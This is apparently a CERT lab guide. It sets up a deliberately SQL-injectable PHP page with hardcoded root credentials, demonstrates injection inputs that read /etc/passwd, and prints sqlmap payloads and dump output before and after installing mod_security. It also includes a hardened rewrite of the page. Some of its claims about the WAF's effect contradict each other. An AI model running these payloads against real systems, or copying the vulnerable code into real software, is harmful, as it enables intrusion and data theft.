
REQUIREMENTS

The following software items are required to carry out the lab:

- VM with CentOS Linux 7
- VM with Windows 10

LAB EXECUTION


Task 1
Preparing the test environment

Activity 1

1. Start the CentOS Linux 7 machine

2. Update the operating system

yum update

3. Install the services.

yum install httpd mariadb-server php php-mysql

NOTE: The packages are current as of this date (27/12/17):

MariaDB - 5.5.56
Apache - 2.4.3

4. Start the services.

systemctl start httpd


systemctl start mariadb

5. Check the status of the services.

systemctl status httpd


systemctl status mariadb

6. Set the root password.

mysql_secure_installation

7. Verify access to MariaDB

mysqladmin -u root -p version

8. Configure the local firewall to allow access to the Apache server.

firewall-cmd --get-active-zones
firewall-cmd --zone=public --add-port=80/tcp --permanent
firewall-cmd --reload

9. Create a test database

mysql -u root -p

show databases;
CREATE DATABASE episodio1;
USE episodio1;

CREATE TABLE `blog` (
  `id` int(11) DEFAULT NULL,
  `content` varchar(100) DEFAULT NULL
);

INSERT INTO `blog` VALUES (1,'testing 1.. 2.. 3..');
INSERT INTO `blog` VALUES (2,'testing 2.. 3.. 4..');
INSERT INTO `blog` VALUES (3,'testing 3.. 4.. 5..');
select * from blog;
exit

10. Configure activity logging in the file /etc/my.cnf by adding the following lines:

[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
symbolic-links=0
#enable logging
general_log=1
general_log_file=/var/log/query.log

11. Create the log file and set its ownership:

touch /var/log/query.log
chown mysql:mysql /var/log/query.log

12. Restart MariaDB

service mysqld restart

13. View the log file

tail -f /var/log/query.log

14. Create the file /var/www/html/blog.php


<?php
// Lab script: intentionally vulnerable to SQL injection (see Task 2).

if (!$link = mysql_connect('localhost', 'root', '12345678')) {
    echo 'Could not connect to mysql';
    exit;
}

if (!mysql_select_db('episodio1', $link)) {
    echo 'No se pudo seleccionar la base de datos episodio1';
    exit;
}

// The id parameter is taken from the query string without validation...
$id = $_GET["id"];

// ...and concatenated directly into the SQL statement.
$sql = "SELECT * FROM blog where id = '$id'";

$result = mysql_query($sql, $link);

if (!$result) {
    echo "DB Error, no se pudo consultar la base de datos\n";
    echo 'MySQL Error: ' . mysql_error();
    exit;
}

while ($row = mysql_fetch_assoc($result)) {
    echo $row['content'];
}

mysql_free_result($result);

?>

15. Change the ownership of the file /var/www/html/blog.php

chown apache:apache blog.php

16. Restart the services

systemctl restart httpd


systemctl restart mariadb

Task 2
SQL injection tests

Activity 1

1. Start the Windows 10 machine

2. Open a web browser and load the default web page


3. Let's move on to the blog.php script and try some examples.

/blog.php?id=1

4. Let's see what an attacker could do.

/blog.php?id=1' or id = '3

5. We can use a built-in MySQL function called load_file to read files from the operating system and return them inside a SQL statement.

/blog.php?id=1' UNION select 2, load_file("/etc/passwd")'

6. The log file shows:


NOTE: As can be seen, even though the operating system and the services are up to date, the SQL injection attack is effective. This is because best practices were not followed when developing the application.

7. Testing with sqlmap, access to the data in the table can be obtained.
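The NOTE above attributes the result to the application, not the platform. As an added example (not the lab's own code), the following is blog.php rewritten the way the "best practices" it refers to would require: the id is validated as an integer, the query is a prepared statement with a bound parameter, the database account is a dedicated read-only user instead of root, and errors are logged server-side rather than echoed. The account name blog_ro, the password file path and the messages are placeholders assumed for this example; the mysqli calls used exist in the PHP 5.4 shipped with CentOS 7.

```php
<?php
// Added example (not part of the lab): a hardened version of blog.php.
// Assumptions: the mysqli extension is available, and a dedicated
// low-privilege account was created beforehand, for example:
//   CREATE USER 'blog_ro'@'localhost' IDENTIFIED BY '<strong password>';
//   GRANT SELECT ON episodio1.blog TO 'blog_ro'@'localhost';
// The account name, the password file path and the messages shown to the
// client are placeholders chosen for this example.

// Turn driver errors into exceptions so failures are handled in one place
// and are never echoed to the browser the way mysql_error() was.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// 1. Input validation. The id column is int(11); accept only a short run
//    of digits, so a quote, a UNION or load_file() never reaches the SQL.
$rawId = isset($_GET['id']) ? $_GET['id'] : '';
if (!preg_match('/^[0-9]{1,10}$/', $rawId)) {
    http_response_code(400);
    echo 'Invalid id';
    exit;
}
$id = (int) $rawId;

try {
    // 2. Least privilege. Not root: blog_ro can only SELECT from one table,
    //    and without the FILE privilege load_file() returns NULL even if an
    //    injection were found elsewhere. The password is kept outside the
    //    web root, readable only by the apache user (assumed path).
    $password = trim(file_get_contents('/etc/httpd/conf/blog_db.pass'));
    $link = new mysqli('localhost', 'blog_ro', $password, 'episodio1');
    $link->set_charset('utf8');

    // 3. Prepared statement. The value is bound as an integer parameter,
    //    so the statement text is fixed before any user data is seen.
    $stmt = $link->prepare('SELECT content FROM blog WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($content);

    // 4. Output encoding, so stored content cannot be rendered as HTML.
    while ($stmt->fetch()) {
        echo htmlspecialchars($content, ENT_QUOTES, 'UTF-8');
    }
    $stmt->close();
    $link->close();
} catch (mysqli_sql_exception $e) {
    // Detail goes to the server log (Apache's /var/log/httpd/error_log);
    // the client only sees a generic message.
    error_log('blog.php DB error: ' . $e->getMessage());
    http_response_code(500);
    echo 'DB Error';
}
?>
```

With this version the requests from steps 4 and 5 are rejected at the validation step with a 400 before any SQL is built, and the general_log configured in Task 1 only ever records the fixed statement with a numeric parameter; mod_security (Task 3) then remains a second layer rather than the only one.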


Task 3
Install mod_security

Activity 1

1. Go to the CentOS Linux 7 machine

yum install mod_security mod_security_crs

2. Restart Apache

systemctl restart httpd

3. Test queries against the database:

4. View the Apache log file /var/log/httpd/error_log


5. Add the following line to the file C:\Windows\System32\drivers\etc\hosts:

172.16.1.4 www.prueba.com.pe

6. Test again:

7. Let's see what an attacker could do now:

/blog.php?id=1' or id = '3

8. The /etc/passwd file can be seen

9. The log file /var/log/httpd/error_log shows:


10. Testing with sqlmap, we can see that it cannot gain access, because the WAF is blocking the vulnerability.

Annex 1

root@PeCERT-002:~# sqlmap -u www.prueba.com.pe/blog.php?id=1 --dbs

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 14:04:19

[14:04:19] [INFO] resuming back-end DBMS 'mysql'
[14:04:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6424=6424 AND 'ihFB'='ihFB

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT
(ELT(3041=3041,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a) AND 'Qszm'='Qszm

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Izqz'='Izqz

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT
NULL,CONCAT(0x717a787171,0x416d5a5a4d685876417a745a427377627273716d7a5a70766f49765859784a725
36f634f7a566d64,0x716b6a7871)-- xkVn
---
[14:04:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[14:04:19] [INFO] fetching database names
available databases [5]:
[*] episodio1
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

[14:04:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.prueba.com.pe'

[*] shutting down at 14:04:19

root@PeCERT-002:~# sqlmap -u www.prueba.com.pe/blog.php?id=1 -D episodio1 --tables

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 14:08:42

[14:08:42] [INFO] resuming back-end DBMS 'mysql'
[14:08:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6424=6424 AND 'ihFB'='ihFB

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT
(ELT(3041=3041,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a) AND 'Qszm'='Qszm

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Izqz'='Izqz

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT
NULL,CONCAT(0x717a787171,0x416d5a5a4d685876417a745a427377627273716d7a5a70766f49765859784a725
36f634f7a566d64,0x716b6a7871)-- xkVn
---
[14:08:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[14:08:42] [INFO] fetching tables for database: 'episodio1'
Database: episodio1
[1 table]
+------+
| blog |
+------+

[14:08:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.prueba.com.pe'

[*] shutting down at 14:08:42

root@PeCERT-002:~# sqlmap -u www.prueba.com.pe/blog.php?id=1 -D episodio1 -T blog --columns

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 14:09:01

[14:09:02] [INFO] resuming back-end DBMS 'mysql'
[14:09:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6424=6424 AND 'ihFB'='ihFB
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT
(ELT(3041=3041,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a) AND 'Qszm'='Qszm

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Izqz'='Izqz

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT
NULL,CONCAT(0x717a787171,0x416d5a5a4d685876417a745a427377627273716d7a5a70766f49765859784a725
36f634f7a566d64,0x716b6a7871)-- xkVn
---
[14:09:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[14:09:02] [INFO] fetching columns for table 'blog' in database 'episodio1'
Database: episodio1
Table: blog
[2 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| content | varchar(100) |
| id      | int(11)      |
+---------+--------------+

[14:09:02] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.prueba.com.pe'

[*] shutting down at 14:09:02

root@PeCERT-002:~# sqlmap -u www.prueba.com.pe/blog.php?id=1 -D episodio1 -T blog -C id --dump

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 14:09:23

[14:09:23] [INFO] resuming back-end DBMS 'mysql'
[14:09:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6424=6424 AND 'ihFB'='ihFB

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT
(ELT(3041=3041,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a) AND 'Qszm'='Qszm

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Izqz'='Izqz
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT
NULL,CONCAT(0x717a787171,0x416d5a5a4d685876417a745a427377627273716d7a5a70766f49765859784a725
36f634f7a566d64,0x716b6a7871)-- xkVn
---
[14:09:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[14:09:23] [INFO] fetching entries of column(s) 'id' for table 'blog' in database 'episodio1'
Database: episodio1
Table: blog
[3 entries]
+----+
| id |
+----+
| 3  |
| 1  |
| 2  |
+----+

[14:09:23] [INFO] table 'episodio1.blog' dumped to CSV file '/root/.sqlmap/output/www.prueba.com.pe/dump/episodio1/blog.csv'
[14:09:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.prueba.com.pe'

[*] shutting down at 14:09:23

root@PeCERT-002:~#

Jr. Carabaya cuadra 1 s/n - Lima (Palacio de Gobierno).
Switchboard: (51 1) 219 7000, extensions 5111 5129
e-mail: pecert@pcm.gob.pe
mfrayssinet@pcm.gob.pe